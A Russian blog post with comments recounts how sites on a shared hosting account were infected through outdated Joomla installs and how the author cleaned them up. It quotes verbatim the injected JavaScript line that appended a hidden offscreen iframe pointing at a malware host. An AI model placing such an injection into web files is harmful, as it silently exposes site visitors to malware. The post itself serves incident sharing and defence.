чт, 10/01/2013 - 12:36
Данный материал посвящен Drupal косвенно. В канун Нового Года доброжелатели сделали мне подарок – iframe вирус, который распространился на все сайты аккаунта хостинга beget.ru.
Заметить, что с сайтом, что-то произошло помог браузер Google Chrome, который запрещал дальнейшему обращению к данному сайту. Chrome на все окно отобразил следующее содержание:
На эту веб-страницу было вставлено содержание с **** известного распространителя вредоносного ПО
И что не удивительно, в коде страницы был обнаружен iframe c ссылкой на этот ресурс.
Но откуда эта вставка могла появиться на моем проекте? Помимо, iframe вставки было обнаружено, что *.js файлы были изменены, в конец файлов добавлены строчки:
“;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://bxprgiui.qhigh.com/geowgjwiehgwvbb.cfg?11"></iframe>');”.
Собственно, вот откуда взялся этот загадочный iframe. Возник следующий вопрос, откуда тогда во всех *.js, файлах возникла данная строка?
Тогда я еще не знал, что источник находится совсем не в Drupal. Недолго думая, было принято решение откатиться на более раннюю версию, благо у хостера имеются бекапы. Ну все, вируса нет, Chrome больше не ругается, разметка чистая – победа за нами. После этого было обновлено ядро Drupal до последний версии, еще раз все проверили, все чисто.
Спустя 10 минут, ко мне подходит сотрудник офиса и говорит о странном сообщении, которое все еще появляется при попытке обращения к нашему сайту. “Это кеш” – говорю ему, самонадеянно. И незаметно для него, уже открываю сайт в браузере, чтобы на всякий случай убедиться, что все хорошо. Но нет, враг не побежден, начали жаловаться и на другие сайты. Тут я понял, что справиться с таким подарком без подготовки не выйдет.
После серфинга в Google, общения с тех поддержкой, и сообществом DrupalSPB мы узнали, что проблема крылась в “забытых проектах”, на этих проектах использовалась Joomla и ,разумеется, она была не обновлена.
Таким образом, мы получили ответ на поставленный выше вопрос. Используя уязвимость безопасности устаревшей версии этой системы, на сайты были добавлены shell-скрипты, которые позволяли выполнять команды от лица веб-сервера и править все js файлы. Теперь настало время действовать:
- Все компьютеры, которые могут подключаться по FTP к сайту, проверили антивирусом
- Отлинковали все сайты
- Поменяли все пароли на FTP
- Восстановили из бекапа и обновили все сайты
- Запустили все обратно в обычном режиме
Так же, мы больше не подключаемся к аккаунту по FTP, чтобы избежать подобных проблем.
Вирус больше нас не тревожил. Вот такая история, возможно, кому-то окажется полезной или интересной.
Комментарии
Поучительная история. Спасибо
Поучительная история. Спасибо, что поделился опытом!
Все чаще и чаще слышу о заражениях сайтов, пора всерьез браться за безопасность.
Ну, вроде ничего особенно
Ну, вроде ничего особенно криминального. Все как обычно, "не следишь за обновлениями" = "получаешь много подарков".=)
Обидно только что файлы шел скриптов потёр, так бы можно было изучить.
Хорошее начало года с серии
Хорошее начало года с серии уязвимостей ;)
Firefox
RoR
Java
Плохо то, что пользователю,
Плохо то, что пользователю, от которого запущен веб сервер были даны права писать туда, куда ему писать совершенно не надо, например в пресловутые js файлы...
Т.е. то, что изначально уязвимость у вас была на другом сайте аккаунта, это одно, но для безопасности вашего Drupal тоже сделано отнюдь не всё...